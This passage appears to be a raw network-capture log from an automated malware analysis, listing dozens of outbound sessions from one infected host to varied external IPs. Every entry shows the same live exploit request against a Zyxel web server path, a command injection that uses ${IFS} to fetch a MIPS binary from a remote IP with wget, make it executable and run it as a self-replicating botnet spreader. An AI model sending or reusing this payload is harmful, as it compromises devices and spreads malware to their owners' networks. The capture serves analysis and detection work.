                                        Jan 14, 2024 16:18:37.288424015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2416192.168.2.134945871.203.217.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288482904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2417192.168.2.135910076.52.34.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288543940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2418192.168.2.1353096141.87.92.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288578987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2419192.168.2.134864461.97.101.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288657904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2420192.168.2.1337484176.166.114.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288738966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2421192.168.2.133595089.183.166.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288794041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2422192.168.2.135135851.181.213.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288846970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2423192.168.2.1347308193.45.190.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288902998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2424192.168.2.133310677.166.89.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288990021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2425192.168.2.1336460135.136.146.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289020061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2426192.168.2.135467638.138.57.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289081097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2427192.168.2.135933894.225.86.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289146900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2428192.168.2.135458673.254.161.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289213896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2429192.168.2.13427361.10.251.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289294958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2430192.168.2.134325040.174.246.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289357901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2431192.168.2.1340030122.241.102.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289405107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2432192.168.2.1348734162.115.171.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289459944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2433192.168.2.1342564140.206.236.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289520025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2434192.168.2.133884277.222.138.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289581060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2435192.168.2.1352652188.239.165.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.289639950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2436192.168.2.134510868.207.109.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.290105104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2437192.168.2.1346056178.56.154.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295041084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2438192.168.2.134304474.23.50.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295140982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2439192.168.2.1360920152.129.79.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295172930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2440192.168.2.1347852110.67.225.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295207977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2441192.168.2.1346906143.175.250.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295270920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2442192.168.2.134051060.5.77.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.295308113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2443192.168.2.1344680208.135.154.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297449112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2444192.168.2.1358860216.133.63.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297503948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2445192.168.2.1356922167.212.182.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297545910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2446192.168.2.134051457.107.228.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297576904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2447192.168.2.1360850128.243.32.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297615051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2448192.168.2.134765482.73.222.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297662973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2449192.168.2.134276624.237.65.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297708988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2450192.168.2.1336418118.86.7.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297775030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2451192.168.2.135842464.113.134.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297800064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2452192.168.2.133353470.14.158.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297826052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2453192.168.2.133790471.6.242.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297871113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2454192.168.2.135331089.229.41.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297900915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2455192.168.2.1357310121.73.226.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297947884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2456192.168.2.135508287.174.31.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.297980070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2457192.168.2.134432031.155.97.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298012018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2458192.168.2.1353982201.242.190.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298067093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2459192.168.2.1351776219.203.181.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298105955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2460192.168.2.1336704154.15.109.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298141956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2461192.168.2.136083689.42.185.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298178911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2462192.168.2.1333442223.137.7.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298207045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2463192.168.2.1339736206.72.65.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298249960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2464192.168.2.1353622133.8.98.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298284054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2465192.168.2.135522047.77.178.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298332930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2466192.168.2.1352856126.181.161.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298388004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2467192.168.2.13541765.244.75.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298407078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2468192.168.2.1339332135.148.66.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298460960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2469192.168.2.135132873.39.24.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298512936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2470192.168.2.133522880.159.165.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298552036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2471192.168.2.1342532209.219.247.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298594952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2472192.168.2.1340280219.170.195.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298629999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2473192.168.2.1360706110.16.229.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298692942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2474192.168.2.1348220179.97.23.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298724890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2475192.168.2.135081435.141.177.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298774958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2476192.168.2.1337194204.253.239.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298820019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2477192.168.2.135717461.57.155.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298840046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2478192.168.2.135265253.224.120.78443
                                        TimestampBytes transferredDirectionData
